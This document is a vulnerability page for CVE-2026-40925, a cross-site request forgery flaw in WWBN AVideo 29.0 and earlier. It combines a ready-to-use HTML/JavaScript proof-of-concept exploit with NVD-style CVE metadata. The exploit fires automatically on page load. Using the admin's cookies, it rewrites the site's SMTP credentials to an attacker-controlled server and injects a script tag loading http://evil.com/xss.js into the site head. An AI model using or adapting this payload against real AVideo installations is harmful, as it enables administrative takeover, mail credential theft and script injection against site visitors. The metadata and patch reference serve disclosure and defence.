CVE-2026-40925

<!-- PoC for CVE-2026-40925 Demonstrates CSRF to update AVideo configuration settings. Target: WWBN AVideo <= 29.0 --> <html> <body> <h2>CSRF PoC Loading...</h2> <script> // The vulnerable endpoint const target_url = "http://target-avideo-site.com/objects/configurationUpdate.json.php"; // Malicious payload to change settings // Modifying SMTP and injecting script into site head const payload = { "smtp": { "host": "attacker-controlled-smtp.com", "user": "hacker", "pass": "password123" }, "siteHeadHtml": "<script src='http://evil.com/xss.js'></script>", "contactEmail": "[email protected]" }; // Function to execute the attack function sendAttack() { fetch(target_url, { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: new URLSearchParams(payload).toString(), credentials: "include" // Ensures the admin's cookie is sent }) .then(response => response.json()) .then(data => console.log("CSRF Attack Success:", data)) .catch(error => console.error("Error:", error)); } // Auto-trigger on load window.onload = sendAttack; </script> </body> </html>

{"cve": {"id": "CVE-2026-40925", "sourceIdentifier": "[email protected]", "published": "2026-04-21T21:16:45.903", "lastModified": "2026-04-24T16:46:18.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/configurationUpdate.json.php` (also routed via `/updateConfig`) persists dozens of global site settings from `$_POST` but protects the endpoint only with `User::isAdmin()`. It does not call `forbidIfIsUntrustedRequest()`, does not verify a `globalToken`, and does not validate the Origin/Referer header. Because AVideo intentionally sets `session.cookie_samesite=None` to support cross-origin iframe embedding, a logged-in administrator who visits an attacker-controlled page will have the browser auto-submit a cross-origin POST that rewrites the site's encoder URL, SMTP credentials, site `<head>` HTML, logo, favicon, contact email, and more in a single request. Commit f9492f5e6123dff0292d5bb3164fde7665dc36b4 contains a fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "29.0", "matchCriteriaId": "AC38CA07-71C1-4C86-B84A-83CF96367CBA"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/f9492f5e6123dff0292d5bb3164fde7665dc36b4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-vvfw-4m39-fjqf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-vvfw-4m39-fjqf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}